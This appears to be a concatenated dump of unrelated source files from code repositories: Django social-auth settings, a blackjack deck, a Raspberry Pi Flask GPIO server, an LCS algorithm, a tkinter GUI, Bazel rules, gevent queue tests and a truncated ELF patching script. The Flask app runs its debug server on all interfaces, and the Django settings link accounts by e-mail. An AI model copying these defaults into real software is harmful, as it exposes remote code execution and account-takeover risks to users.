SOCIAL_AUTH_ASSOCIATE_BY_MAIL = True

# social_auth pipeline; order matters -- the custom e-mail steps
# (users.social_auth.pipeline.*) run before the stock user-creation steps.
SOCIAL_AUTH_PIPELINE = (
    'social_auth.backends.pipeline.social.social_auth_user',
    'social_auth.backends.pipeline.misc.save_status_to_session',
    'users.social_auth.pipeline.ask_email',
    'users.social_auth.pipeline.associate_by_email',
    'social_auth.backends.pipeline.user.get_username',
    'social_auth.backends.pipeline.user.create_user',
    'social_auth.backends.pipeline.social.associate_user',
    'social_auth.backends.pipeline.social.load_extra_data',
    'social_auth.backends.pipeline.user.update_user_details'
)

GOOGLE_ANALYTICS_UA = os.environ['GOOGLE_ANALYTICS_UA']
ace7315479e41abe05fda4df842d0995d23347c4 | 553 | py | Python | deck.py | igorbrodzinski/blackjack-terminal-game | 298241aff2a8096d7d27a50899e515e94cfda928 | [
"MIT"
] | null | null | null | deck.py | igorbrodzinski/blackjack-terminal-game | 298241aff2a8096d7d27a50899e515e94cfda928 | [
"MIT"
] | null | null | null | deck.py | igorbrodzinski/blackjack-terminal-game | 298241aff2a8096d7d27a50899e515e94cfda928 | [
"MIT"
] | null | null | null | from card import Card
from suit import Suit
from rank import Rank
from typing import List
from random import randint, shuffle
class Deck:
    """A shuffled 52-card deck built from every Rank/Suit combination."""

    # The remaining cards; index len-1 is the top of the (shuffled) deck.
    cards: List[Card]

    def __init__(self) -> None:
        self.initialize_deck()

    def initialize_deck(self) -> None:
        """Create a full deck (one card per rank/suit pair) and shuffle it."""
        self.cards = [Card(rank, suit) for rank in Rank for suit in Suit]
        shuffle(self.cards)

    def draw_card(self) -> Card:
        """Remove and return one card.

        The deck is shuffled, so popping from the end is a uniformly random
        draw in O(1), unlike popping a random index which shifts the list
        (O(n)).  Drawing from an empty deck raises IndexError.
        """
        return self.cards.pop()

    def reset_deck(self) -> None:
        """Restore and reshuffle the full deck."""
        self.initialize_deck()
ace73156cdb53722f006362dec4495f6eb8dc662 | 2,493 | py | Python | rpiWebServer/app.py | lishaprakash/flowmeter | db3e072e6876466f58ceb2573f468ae899de880d | [
"Apache-2.0"
] | null | null | null | rpiWebServer/app.py | lishaprakash/flowmeter | db3e072e6876466f58ceb2573f468ae899de880d | [
"Apache-2.0"
] | null | null | null | rpiWebServer/app.py | lishaprakash/flowmeter | db3e072e6876466f58ceb2573f468ae899de880d | [
"Apache-2.0"
] | null | null | null | '''
Raspberry Pi GPIO Status and Control
'''
import RPi.GPIO as GPIO
from flask import Flask, render_template, request
app = Flask(__name__)
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
#define sensors GPIOs
button = 20
senPIR = 16
#define actuators GPIOs
ledRed = 13
ledYlw = 19
ledGrn = 26
#initialize GPIO status variables
buttonSts = 0
senPIRSts = 0
ledRedSts = 0
ledYlwSts = 0
ledGrnSts = 0
# Define button and PIR sensor pins as an input
GPIO.setup(button, GPIO.IN)
GPIO.setup(senPIR, GPIO.IN)
# Define led pins as output
GPIO.setup(ledRed, GPIO.OUT)
GPIO.setup(ledYlw, GPIO.OUT)
GPIO.setup(ledGrn, GPIO.OUT)
# turn leds OFF
GPIO.output(ledRed, GPIO.LOW)
GPIO.output(ledYlw, GPIO.LOW)
GPIO.output(ledGrn, GPIO.LOW)
@app.route("/")
def index():
# Read GPIO Status
# buttonSts = GPIO.input(button)
# senPIRSts = GPIO.input(senPIR)
# ledRedSts = GPIO.input(ledRed)
# ledYlwSts = GPIO.input(ledYlw)
# ledGrnSts = GPIO.input(ledGrn)
# templateData = {
# 'button' : buttonSts,
# 'senPIR' : senPIRSts,
# 'ledRed' : ledRedSts,
# 'ledYlw' : ledYlwSts,
# 'ledGrn' : ledGrnSts,
# }
templateData = {
'name' : 'Jason'
}
return render_template('index_initial.html',**templateData)
@app.route("/<username>")
def show_username(username):
templateData = {
'name': username
}
return render_template('index_initial.html',**templateData)
@app.route("/gif")
def show_gif():
templateData = {
'name': 'Dumbass'
}
return render_template('index_initial.html',**templateData)
# The function below is executed when someone requests a URL with the actuator
# name and action in it, e.g. /ledRed/on
@app.route("/<deviceName>/<action>")
def action(deviceName, action):
    """Switch the requested LED on or off, then re-render the status page."""
    # Map URL device names to GPIO pins.  Previously an unknown deviceName
    # left 'actuator' unassigned and raised NameError (HTTP 500).
    actuators = {'ledRed': ledRed, 'ledYlw': ledYlw, 'ledGrn': ledGrn}
    actuator = actuators.get(deviceName)
    if actuator is None:
        return "Unknown device: {}".format(deviceName), 404
    if action == "on":
        GPIO.output(actuator, GPIO.HIGH)
    if action == "off":
        GPIO.output(actuator, GPIO.LOW)
    # Read back every sensor/LED state for the template.
    buttonSts = GPIO.input(button)
    senPIRSts = GPIO.input(senPIR)
    ledRedSts = GPIO.input(ledRed)
    ledYlwSts = GPIO.input(ledYlw)
    ledGrnSts = GPIO.input(ledGrn)
    templateData = {
        'button': buttonSts,
        'senPIR': senPIRSts,
        'ledRed': ledRedSts,
        'ledYlw': ledYlwSts,
        'ledGrn': ledGrnSts,
    }
    return render_template('index.html', **templateData)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000, debug=True)
| 22.663636 | 101 | 0.666667 |
ace7315e5d5f25f71f6aaef6240e4eba44f8ca2c | 1,956 | py | Python | LongestCommonSubseq.py | iamkartik/Algorithms | 0ac5c8e90e0cd08ece99ad53f592b6fb283d86b0 | [
"MIT"
] | null | null | null | LongestCommonSubseq.py | iamkartik/Algorithms | 0ac5c8e90e0cd08ece99ad53f592b6fb283d86b0 | [
"MIT"
] | null | null | null | LongestCommonSubseq.py | iamkartik/Algorithms | 0ac5c8e90e0cd08ece99ad53f592b6fb283d86b0 | [
"MIT"
] | null | null | null | import numpy as np
def lcs(a,b,c,m,n,p,t):
if m<0 or n<0 or p<0:
# print(t)
return 0
else:
if a[m]==b[n]==c[p]:
t=f'{t}{a[m]}'
return 1+lcs(a,b,c,m-1,n-1,p-1,t)
else:
return max(
lcs(a,b,c,m-1,n,p,t),
lcs(a,b,c,m,n-1,p,t),
lcs(a,b,c,m,n,p-1,t)
)
def lcsdp(a, b, c):
    """Bottom-up DP for the LCS of three strings; prints the length and one LCS.

    ``dp[i][j][k]`` holds the LCS length of a[:i], b[:j], c[:k].  After the
    table is filled, the while-loop walks back from (m, n, p) reconstructing
    one longest common subsequence, which is printed (nothing is returned).
    """
    m = len(a)
    n = len(b)
    p = len(c)
    t = ""  # unused; kept for symmetry with the recursive version
    dp = np.zeros((m + 1, n + 1, p + 1))
    # print(dp)
    for i in range(m + 1):
        for j in range(n + 1):
            for k in range(p + 1):
                if i == 0 or j == 0 or k == 0:
                    continue  # any empty prefix contributes 0
                if a[i-1] == b[j-1] == c[k-1]:
                    dp[i][j][k] = dp[i-1][j-1][k-1] + 1
                else:
                    dp[i][j][k] = max(
                        dp[i-1][j][k],
                        dp[i][j-1][k],
                        dp[i][j][k-1]
                    )
    print(dp[m][n][p])
    # After the loops, i == m, j == n, k == p (range(m+1) ends at m).
    print(i, m, j, n, k, p)
    # NOTE: shadows the builtin 'str' while accumulating the subsequence.
    str = ""
    while i > 0 and j > 0 and k > 0:
        # print(i,j,k)
        if a[i-1] == b[j-1] == c[k-1]:
            # Matching character: it belongs to the LCS; step back diagonally.
            print(a[i-1])
            str = f'{a[i-1]}{str}'
            i -= 1
            j -= 1
            k -= 1
            # print(i,j,k)
        else:
            # Otherwise step toward whichever neighbor holds the maximum.
            n1 = dp[i-1][j][k]
            n2 = dp[i][j-1][k]
            n3 = dp[i][j][k-1]
            if n1 >= n2 and n1 >= n3:
                i -= 1
            elif n2 >= n1 and n2 >= n3:
                j -= 1
            elif n3 >= n1 and n3 >= n2:
                k -= 1
            else:
                print('##', n1, n2, n3)  # unreachable: one branch always holds
    print(str)
if __name__ == "__main__":
a="6662220542630314443712"
# a="ACHCGGTCGAGTTGCGCGGAHAGCCLGGCCGAA"
b="00078321207413782377777"
# b="GTCXGTTCGDGAATGFCGTTGCTOTGTAAA"
c="6664664567861104057425"
# c="AKLGTCGTCGGAAUIOGCCGGCCGAA"
m=len(a)
n=len(b)
p=len(c)
t=""
print(m)
# test=lcs(a,b,c,m-1,n-1,p-1,t)
lcsdp(a,b,c)
| 22.227273 | 51 | 0.367076 |
ace7319cf23e42df940004b278438542b294c870 | 4,125 | py | Python | src/m2_tkinter_as_mqtt_sender.py | vandensp/25-TkinterAndMQTT | f8ab2a274765b07bba05966594d5bd2acaee6e68 | [
"MIT"
] | null | null | null | src/m2_tkinter_as_mqtt_sender.py | vandensp/25-TkinterAndMQTT | f8ab2a274765b07bba05966594d5bd2acaee6e68 | [
"MIT"
] | null | null | null | src/m2_tkinter_as_mqtt_sender.py | vandensp/25-TkinterAndMQTT | f8ab2a274765b07bba05966594d5bd2acaee6e68 | [
"MIT"
] | null | null | null | """
Using a fake robot as the receiver of messages.
"""
# Done: 1. In mqtt_remote_method_calls, set LEGO_NUMBER at line 131
# to YOUR robot's number.
# Done: 2. Copy your Tkinter/ttk ROBOT gui code from the previous session (m6).
# Then modify it so that pressing a button sends a message to a teammate
# of the form:
# (for Forward)
# ["forward", X, y]
# where X and Y are from the entry box.
#
"""
This project lets you try out Tkinter/Ttk and practice it!
Authors: David Mutchler, Vibha Alangar, Matt Boutell, Dave Fisher,
Mark Hays, Amanda Stouder, Aaron Wilkin, their colleagues,
and Samuel VanDenburgh.
""" # Done: 1. PUT YOUR NAME IN THE ABOVE LINE.
import tkinter
from tkinter import ttk
def main():
    """ Constructs a GUI that will be used MUCH later to control EV3. """
    # -------------------------------------------------------------------------
    # Done: 2. Follow along with the video to make a remote control GUI
    #   For every grid() method call you will add a row and a column argument
    # -------------------------------------------------------------------------
    root = tkinter.Tk()
    root.title("MQTT Remote")

    main_frame = ttk.Frame(root, padding=20)
    main_frame.grid()  # only grid call that does NOT need a row and column

    # Motor-speed entry boxes, pre-filled with 600.
    left_speed_label = ttk.Label(main_frame, text="Left")
    left_speed_label.grid()
    left_speed_entry = ttk.Entry(main_frame, width=8)
    left_speed_entry.insert(0, "600")
    left_speed_entry.grid()

    right_speed_label = ttk.Label(main_frame, text="Right")
    right_speed_label.grid()
    right_speed_entry = ttk.Entry(main_frame, width=8, justify=tkinter.RIGHT)
    right_speed_entry.insert(0, "600")
    right_speed_entry.grid()

    # Movement buttons; each also gets a keyboard shortcut bound on root.
    forward_button = ttk.Button(main_frame, text="Forward")
    forward_button.grid()
    forward_button['command'] = lambda: print("Forward button")
    root.bind('<Up>', lambda event: print("Forward key"))

    left_button = ttk.Button(main_frame, text="Left")
    left_button.grid()
    left_button['command'] = lambda: print("Left button")
    root.bind('<Left>', lambda event: print("Left key"))

    stop_button = ttk.Button(main_frame, text="Stop")
    stop_button.grid()
    stop_button['command'] = lambda: print("Stop button")
    root.bind('<space>', lambda event: print("Stop key"))

    right_button = ttk.Button(main_frame, text="Right")
    right_button.grid()
    right_button['command'] = lambda: print("Right button")
    root.bind('<Right>', lambda event: print("Right key"))

    back_button = ttk.Button(main_frame, text="Back")
    back_button.grid()
    back_button['command'] = lambda: print("Back button")
    root.bind('<Down>', lambda event: print("Back key"))

    up_button = ttk.Button(main_frame, text="Up")
    up_button.grid()
    up_button['command'] = lambda: print("Up button")
    root.bind('<u>', lambda event: print("Up key"))

    down_button = ttk.Button(main_frame, text="Down")
    down_button.grid()
    down_button['command'] = lambda: print("Down button")
    root.bind('<j>', lambda event: print("Down key"))

    # Buttons for quit and exit
    q_button = ttk.Button(main_frame, text="Quit")
    q_button.grid()
    q_button['command'] = lambda: print("Quit button")

    e_button = ttk.Button(main_frame, text="Exit")
    e_button.grid()
    e_button['command'] = lambda: exit()

    # Final layout: re-grid every widget into its row/column slot (these
    # later grid() calls override the earlier auto-placement ones).
    left_button.grid(row=3, column=0)
    left_speed_entry.grid(row=1, column=0)
    left_speed_label.grid(row=0, column=0)

    forward_button.grid(row=2, column=1)
    stop_button.grid(row=3, column=1)
    back_button.grid(row=4, column=1)

    right_button.grid(row=3, column=2)
    right_speed_entry.grid(row=1, column=2)
    right_speed_label.grid(row=0, column=2)

    up_button.grid(row=5, column=0)
    down_button.grid(row=6, column=0)

    q_button.grid(row=5, column=2)
    e_button.grid(row=6, column=2)

    root.mainloop()
def forward(left_entry, right_entry, mqtt_client):
    """Send a 'forward' MQTT command carrying the two entry-box speed values."""
    speeds = [left_entry.get(), right_entry.get()]
    mqtt_client.send_message("forward", speeds)
main()
| 33.536585 | 79 | 0.644121 |
ace7333688bca64ca675939bad4cde1ea344adf1 | 2,059 | bzl | Python | source/extensions/all_extensions.bzl | haorenfsa/envoy | c2b0d37ca5b40b71ce48984f2cf5984297b79a71 | [
"Apache-2.0"
] | 1 | 2020-06-02T17:21:13.000Z | 2020-06-02T17:21:13.000Z | source/extensions/all_extensions.bzl | haorenfsa/envoy | c2b0d37ca5b40b71ce48984f2cf5984297b79a71 | [
"Apache-2.0"
] | null | null | null | source/extensions/all_extensions.bzl | haorenfsa/envoy | c2b0d37ca5b40b71ce48984f2cf5984297b79a71 | [
"Apache-2.0"
] | null | null | null | load("@bazel_skylib//lib:dicts.bzl", "dicts")
load("@envoy_build_config//:extensions_build_config.bzl", "EXTENSIONS")
# These extensions are registered using the extension system but are required for the core Envoy build.
# The map may be overridden by extensions specified in envoy_build_config.
# These extensions are registered using the extension system but are required for the core Envoy build.
# The map may be overridden by extensions specified in envoy_build_config.
_required_extensions = {
    "envoy.common.crypto.utility_lib": "//source/extensions/common/crypto:utility_lib",
    "envoy.transport_sockets.tls": "//source/extensions/transport_sockets/tls:config",
}

# Return all extensions to be compiled into Envoy.
def envoy_all_extensions(denylist = []):
    """Returns the Bazel targets of every extension except those named in *denylist*."""
    all_extensions = dicts.add(_required_extensions, EXTENSIONS)

    # These extensions can be removed on a site specific basis.
    return [v for k, v in all_extensions.items() if not k in denylist]
# Core extensions needed to run Envoy's integration tests.
_core_extensions = [
    "envoy.access_loggers.file",
    "envoy.filters.http.router",
    "envoy.filters.http.health_check",
    "envoy.filters.network.http_connection_manager",
    "envoy.stat_sinks.statsd",
    "envoy.transport_sockets.raw_buffer",
]

# Return all core extensions to be compiled into Envoy.
def envoy_all_core_extensions():
    """Returns Bazel targets of only the core extensions listed above."""
    all_extensions = dicts.add(_required_extensions, EXTENSIONS)

    # These extensions can be removed on a site specific basis.
    return [v for k, v in all_extensions.items() if k in _core_extensions]
_http_filter_prefix = "envoy.filters.http"
def envoy_all_http_filters():
all_extensions = dicts.add(_required_extensions, EXTENSIONS)
return [v for k, v in all_extensions.items() if k.startswith(_http_filter_prefix)]
# All network-layer filters are extensions with names that have the following prefix.
_network_filter_prefix = "envoy.filters.network"
# Return all network-layer filter extensions to be compiled into network-layer filter generic fuzzer.
def envoy_all_network_filters():
all_extensions = dicts.add(_required_extensions, EXTENSIONS)
return [v for k, v in all_extensions.items() if k.startswith(_network_filter_prefix)]
| 41.18 | 103 | 0.770277 |
ace733ac0641e68557888ec4e327c1fb25e6b28b | 12,107 | py | Python | greentest/test_queue.py | newbrough/gevent-0.13.7 | 5c4ebef04f280e4ee1501a6e697e3b4681b1568d | [
"BSD-3-Clause",
"MIT"
] | 1 | 2021-03-08T14:08:52.000Z | 2021-03-08T14:08:52.000Z | greentest/test_queue.py | newbrough/gevent-0.13.7 | 5c4ebef04f280e4ee1501a6e697e3b4681b1568d | [
"BSD-3-Clause",
"MIT"
] | null | null | null | greentest/test_queue.py | newbrough/gevent-0.13.7 | 5c4ebef04f280e4ee1501a6e697e3b4681b1568d | [
"BSD-3-Clause",
"MIT"
] | null | null | null | # Some simple queue module tests, plus some failure conditions
# to ensure the Queue locks remain stable.
#from __future__ import with_statement
from gevent import monkey; monkey.patch_all()
from gevent import queue as Queue
import threading
import time
import unittest
import test_support
QUEUE_SIZE = 5
# A thread to run a function that unclogs a blocked Queue.
class _TriggerThread(threading.Thread):
    """Runs fn(*args) after a short delay, setting startedEvent just before the call."""

    def __init__(self, fn, args):
        self.fn = fn
        self.args = args
        #self.startedEvent = threading.Event()
        # gevent port: use a gevent Event instead of a native threading.Event.
        from gevent.event import Event
        self.startedEvent = Event()
        threading.Thread.__init__(self)

    def run(self):
        # The sleep isn't necessary, but is intended to give the blocking
        # function in the main thread a chance at actually blocking before
        # we unclog it. But if the sleep is longer than the timeout-based
        # tests wait in their blocking functions, those tests will fail.
        # So we give them much longer timeout values compared to the
        # sleep here (I aimed at 10 seconds for blocking functions --
        # they should never actually wait that long - they should make
        # progress as soon as we call self.fn()).
        time.sleep(0.01)
        self.startedEvent.set()
        self.fn(*self.args)
# Execute a function that blocks, and in a separate thread, a function that
# triggers the release. Returns the result of the blocking function. Caution:
# block_func must guarantee to block until trigger_func is called, and
# trigger_func must guarantee to change queue state so that block_func can make
# enough progress to return. In particular, a block_func that just raises an
# exception regardless of whether trigger_func is called will lead to
# timing-dependent sporadic failures, and one of those went rarely seen but
# undiagnosed for years. Now block_func must be unexceptional. If block_func
# is supposed to raise an exception, call do_exceptional_blocking_test()
# instead.
class BlockingTestMixin:
    """Mixin providing helpers to test blocking queue operations.

    Both helpers run ``block_func`` in the main thread while a
    _TriggerThread calls ``trigger_func`` to release it; they then verify
    that blocking actually happened and that the trigger returned.
    """
    def do_blocking_test(self, block_func, block_args, trigger_func, trigger_args):
        self.t = _TriggerThread(trigger_func, trigger_args)
        self.t.start()
        self.result = block_func(*block_args)
        # If block_func returned before our thread made the call, we failed!
        if not self.t.startedEvent.isSet():
            self.fail("blocking function '%r' appeared not to block" %
                      block_func)
        self.t.join(10) # make sure the thread terminates
        if self.t.isAlive():
            self.fail("trigger function '%r' appeared to not return" %
                      trigger_func)
        return self.result

    # Call this instead if block_func is supposed to raise an exception.
    def do_exceptional_blocking_test(self,block_func, block_args, trigger_func,
                                   trigger_args, expected_exception_class):
        self.t = _TriggerThread(trigger_func, trigger_args)
        self.t.start()
        try:
            try:
                block_func(*block_args)
            except expected_exception_class:
                # Expected path: propagate so the caller's except clause sees it.
                raise
            else:
                self.fail("expected exception of kind %r" %
                          expected_exception_class)
        finally:
            self.t.join(10) # make sure the thread terminates
            if self.t.isAlive():
                self.fail("trigger function '%r' appeared to not return" %
                          trigger_func)
            if not self.t.startedEvent.isSet():
                self.fail("trigger thread ended but event never set")
class BaseQueueTest(unittest.TestCase, BlockingTestMixin):
    """Shared queue tests; subclasses set ``type2test`` to the queue class.

    Covers ordering, full/empty detection, non-blocking and timeout
    failures, blocking put/get, and JoinableQueue.task_done()/join().
    """
    def setUp(self):
        # Accumulator shared by worker threads in queue_join_test.
        self.cum = 0
        self.cumlock = threading.Lock()

    def simple_queue_test(self, q):
        if not q.empty():
            raise RuntimeError, "Call this function with an empty queue"
        # I guess we better check things actually queue correctly a little :)
        q.put(111)
        q.put(333)
        q.put(222)
        # Expected retrieval order differs per queue discipline (FIFO/LIFO/priority).
        target_order = dict(Queue = [111, 333, 222],
                            LifoQueue = [222, 333, 111],
                            PriorityQueue = [111, 222, 333])
        actual_order = [q.get(), q.get(), q.get()]
        self.assertEquals(actual_order, target_order[q.__class__.__name__],
                          "Didn't seem to queue the correct data!")
        for i in range(QUEUE_SIZE-1):
            q.put(i)
        self.assert_(not q.empty(), "Queue should not be empty")
        self.assert_(not q.full(), "Queue should not be full")
        q.put("last")
        self.assert_(q.full(), "Queue should be full")
        # Non-blocking put on a full queue must raise Full immediately.
        try:
            q.put("full", block=0)
            self.fail("Didn't appear to block with a full queue")
        except Queue.Full:
            pass
        try:
            q.put("full", timeout=0.01)
            self.fail("Didn't appear to time-out with a full queue")
        except Queue.Full:
            pass
        self.assertEquals(q.qsize(), QUEUE_SIZE)
        # Test a blocking put
        self.do_blocking_test(q.put, ("full",), q.get, ())
        self.do_blocking_test(q.put, ("full", True, 10), q.get, ())
        # Empty it
        for i in range(QUEUE_SIZE):
            q.get()
        self.assert_(q.empty(), "Queue should be empty")
        # Non-blocking get on an empty queue must raise Empty immediately.
        try:
            q.get(block=0)
            self.fail("Didn't appear to block with an empty queue")
        except Queue.Empty:
            pass
        try:
            q.get(timeout=0.01)
            self.fail("Didn't appear to time-out with an empty queue")
        except Queue.Empty:
            pass
        # Test a blocking get
        self.do_blocking_test(q.get, (), q.put, ('empty',))
        self.do_blocking_test(q.get, (True, 10), q.put, ('empty',))

    def worker(self, q):
        # Consumer loop: accumulate values into self.cum; None is the
        # shutdown sentinel.  Each item is acknowledged with task_done().
        while True:
            x = q.get()
            if x is None:
                q.task_done()
                return
            #with self.cumlock:
            self.cum += x
            q.task_done()

    def queue_join_test(self, q):
        self.cum = 0
        for i in (0,1):
            threading.Thread(target=self.worker, args=(q,)).start()
        for i in xrange(100):
            q.put(i)
        q.join()
        self.assertEquals(self.cum, sum(range(100)),
                          "q.join() did not block until all tasks were done")
        for i in (0,1):
            q.put(None) # instruct the threads to close
        q.join() # verify that you can join twice

    def test_queue_task_done(self):
        # Test to make sure a queue task completed successfully.
        q = Queue.JoinableQueue() # self.type2test()
        # XXX the same test in subclasses
        # task_done() with no outstanding tasks must raise ValueError.
        try:
            q.task_done()
        except ValueError:
            pass
        else:
            self.fail("Did not detect task count going negative")

    def test_queue_join(self):
        # Test that a queue join()s successfully, and before anything else
        # (done twice for insurance).
        q = Queue.JoinableQueue() # self.type2test()
        # XXX the same test in subclass
        self.queue_join_test(q)
        self.queue_join_test(q)
        try:
            q.task_done()
        except ValueError:
            pass
        else:
            self.fail("Did not detect task count going negative")

    def test_simple_queue(self):
        # Do it a couple of times on the same queue.
        # Done twice to make sure works with same instance reused.
        q = self.type2test(QUEUE_SIZE)
        self.simple_queue_test(q)
        self.simple_queue_test(q)
class QueueTest(BaseQueueTest):
    # FIFO queue variant of the shared test suite.
    type2test = Queue.Queue
class LifoQueueTest(BaseQueueTest):
    # LIFO (stack) queue variant of the shared test suite.
    type2test = Queue.LifoQueue
class PriorityQueueTest(BaseQueueTest):
    # Priority (sorted retrieval) queue variant of the shared test suite.
    type2test = Queue.PriorityQueue
# A Queue subclass that can provoke failure at a moment's notice :)
class FailingQueueException(Exception):
    """Raised on demand by FailingQueue to simulate _put/_get failures."""
    pass
class FailingQueue(Queue.Queue):
    """Queue whose next _put or _get can be made to raise on demand.

    Set ``fail_next_put`` / ``fail_next_get`` to True; the flag is
    one-shot and resets itself before raising FailingQueueException.
    """
    def __init__(self, *args):
        self.fail_next_put = False
        self.fail_next_get = False
        Queue.Queue.__init__(self, *args)
    def _put(self, item):
        if self.fail_next_put:
            self.fail_next_put = False
            raise FailingQueueException, "You Lose"
        return Queue.Queue._put(self, item)
    def _get(self):
        if self.fail_next_get:
            self.fail_next_get = False
            raise FailingQueueException, "You Lose"
        return Queue.Queue._get(self)
class FailingQueueTest(unittest.TestCase, BlockingTestMixin):
    """Verifies queue integrity when _put/_get raise mid-operation.

    Injects FailingQueueException at specific points via FailingQueue and
    checks that the queue's internal bookkeeping is not corrupted.
    """
    def failing_queue_test(self, q):
        if not q.empty():
            raise RuntimeError, "Call this function with an empty queue"
        for i in range(QUEUE_SIZE-1):
            q.put(i)
        # Test a failing non-blocking put.
        q.fail_next_put = True
        try:
            q.put("oops", block=0)
            self.fail("The queue didn't fail when it should have")
        except FailingQueueException:
            pass
        q.fail_next_put = True
        try:
            q.put("oops", timeout=0.1)
            self.fail("The queue didn't fail when it should have")
        except FailingQueueException:
            pass
        q.put("last")
        self.assert_(q.full(), "Queue should be full")
        # Test a failing blocking put
        q.fail_next_put = True
        try:
            self.do_blocking_test(q.put, ("full",), q.get, ())
            self.fail("The queue didn't fail when it should have")
        except FailingQueueException:
            pass
        # Check the Queue isn't damaged.
        # put failed, but get succeeded - re-add
        q.put("last")
        # Test a failing timeout put
        q.fail_next_put = True
        try:
            self.do_exceptional_blocking_test(q.put, ("full", True, 10), q.get, (),
                                              FailingQueueException)
            self.fail("The queue didn't fail when it should have")
        except FailingQueueException:
            pass
        # Check the Queue isn't damaged.
        # put failed, but get succeeded - re-add
        q.put("last")
        self.assert_(q.full(), "Queue should be full")
        q.get()
        self.assert_(not q.full(), "Queue should not be full")
        q.put("last")
        self.assert_(q.full(), "Queue should be full")
        # Test a blocking put
        self.do_blocking_test(q.put, ("full",), q.get, ())
        # Empty it
        for i in range(QUEUE_SIZE):
            q.get()
        self.assert_(q.empty(), "Queue should be empty")
        q.put("first")
        q.fail_next_get = True
        try:
            q.get()
            self.fail("The queue didn't fail when it should have")
        except FailingQueueException:
            pass
        # A failed get must leave the item in place.
        self.assert_(not q.empty(), "Queue should not be empty")
        q.fail_next_get = True
        try:
            q.get(timeout=0.1)
            self.fail("The queue didn't fail when it should have")
        except FailingQueueException:
            pass
        self.assert_(not q.empty(), "Queue should not be empty")
        q.get()
        self.assert_(q.empty(), "Queue should be empty")
        q.fail_next_get = True
        try:
            self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',),
                                              FailingQueueException)
            self.fail("The queue didn't fail when it should have")
        except FailingQueueException:
            pass
        # put succeeded, but get failed.
        self.assert_(not q.empty(), "Queue should not be empty")
        q.get()
        self.assert_(q.empty(), "Queue should be empty")

    def test_failing_queue(self):
        # Test to make sure a queue is functioning correctly.
        # Done twice to the same instance.
        q = FailingQueue(QUEUE_SIZE)
        self.failing_queue_test(q)
        self.failing_queue_test(q)
def test_main():
    # Run every queue test class through the stdlib regression-test harness.
    test_support.run_unittest(QueueTest, LifoQueueTest, PriorityQueueTest,
                              FailingQueueTest)
# Allow running this test module directly from the command line.
if __name__ == "__main__":
    test_main()
| 37.024465 | 83 | 0.592137 |
ace734e3b3f465e53b882541c747e64f4be1d45a | 430 | py | Python | venv/Scripts/fitsinfo-script.py | temelkirci/Motion_Editor | a8b8d4c4d2dcc9be28385600f56066cef92a38ad | [
"MIT"
] | 1 | 2022-03-02T17:07:20.000Z | 2022-03-02T17:07:20.000Z | venv/Scripts/fitsinfo-script.py | temelkirci/RealTime_6DOF_Motion_Editor | a8b8d4c4d2dcc9be28385600f56066cef92a38ad | [
"MIT"
] | null | null | null | venv/Scripts/fitsinfo-script.py | temelkirci/RealTime_6DOF_Motion_Editor | a8b8d4c4d2dcc9be28385600f56066cef92a38ad | [
"MIT"
] | null | null | null | #!C:\Users\DOF\Desktop\DOF_Motion_Editor\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'astropy==3.0.5','console_scripts','fitsinfo'
__requires__ = 'astropy==3.0.5'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('astropy==3.0.5', 'console_scripts', 'fitsinfo')()
)
| 33.076923 | 75 | 0.683721 |
ace735b8aabcf70d15529f71e3b6f58bb8f372a0 | 5,469 | py | Python | boards/x86/qemu_x86/scripts/update_elf_load_addr.py | tomaszkob89/sdk-zephyr | a9423cbce69a5df78140a2cf3ba11aa56d395cfc | [
"Apache-2.0"
] | 1 | 2020-03-12T13:18:08.000Z | 2020-03-12T13:18:08.000Z | boards/x86/qemu_x86/scripts/update_elf_load_addr.py | tomaszkob89/sdk-zephyr | a9423cbce69a5df78140a2cf3ba11aa56d395cfc | [
"Apache-2.0"
] | 4 | 2022-03-10T10:11:21.000Z | 2022-03-21T11:41:17.000Z | boards/x86/qemu_x86/scripts/update_elf_load_addr.py | tomaszkob89/sdk-zephyr | a9423cbce69a5df78140a2cf3ba11aa56d395cfc | [
"Apache-2.0"
] | 4 | 2019-11-26T16:15:55.000Z | 2022-01-19T08:47:50.000Z | #!/usr/bin/env python3
#
# Copyright (c) 2021 Intel Corporation
#
# SPDX-License-Identifier: Apache-2.0
"""Update ELF Load Address
This updates the entry and physical load addresses in ELF file
so that QEMU is able to load and run the Zephyr kernel even
though the kernel is linked in virtual address space.
When the Zephyr kernel is linked in virtual address space,
the ELF file only contains virtual addresses which may result
in QEMU loading code and data into non-existent physical memory
if both physical and virtual address space do not start at
the same address. This script modifies the physical addresses
of the load segments so QEMU will place code and data in
physical memory. This also updates the entry address to physical
address so QEMU can jump to it to start the Zephyr kernel.
"""
import argparse
import os
import sys
import struct
from ctypes import create_string_buffer
from elftools.elf.elffile import ELFFile
from elftools.elf.sections import SymbolTableSection
# ELF Header, load entry offset
ELF_HDR_ENTRY_OFFSET = 0x18
def log(text):
    """Write *text* to stdout, prefixed with the script name, when --verbose is set."""
    if not args.verbose:
        return
    prefix = os.path.basename(sys.argv[0])
    sys.stdout.write(prefix + ": " + text + "\n")
def error(text):
    """Abort the program, reporting *text* prefixed with the script name."""
    script = os.path.basename(sys.argv[0])
    message = script + ": " + text
    sys.exit(message)
def extract_all_symbols_from_elf(obj):
    """Return a mapping of symbol name -> st_value from every symbol table.

    Raises LookupError if the ELF object contains no symbols at all.
    """
    symbols = {}
    for section in obj.iter_sections():
        if not isinstance(section, SymbolTableSection):
            continue
        for symbol in section.iter_symbols():
            symbols[symbol.name] = symbol.entry.st_value
    if not symbols:
        raise LookupError("Could not find symbol table")
    return symbols
def parse_args():
    """Populate the module-level ``args`` namespace from the command line."""
    global args
    parser = argparse.ArgumentParser()
    # (flags, add_argument keyword options) for each supported option.
    specs = (
        (("-k", "--kernel"), dict(required=True, help="Zephyr ELF binary")),
        (("-o", "--output"), dict(required=True, help="Output path")),
        (("-v", "--verbose"), dict(action="store_true",
                                   help="Print extra debugging information")),
    )
    for flags, options in specs:
        parser.add_argument(*flags, **options)
    args = parser.parse_args()
def main():
    """Rewrite the ELF entry point and LOAD segment physical addresses.

    Reads the kernel ELF named by --kernel, shifts the entry address and
    each PT_LOAD segment's p_paddr by the virtual-to-physical offset
    derived from the Zephyr config symbols, and writes the patched image
    to --output.
    """
    global args
    parse_args()
    if not os.path.exists(args.kernel):
        error("{0} does not exist.".format(args.kernel))
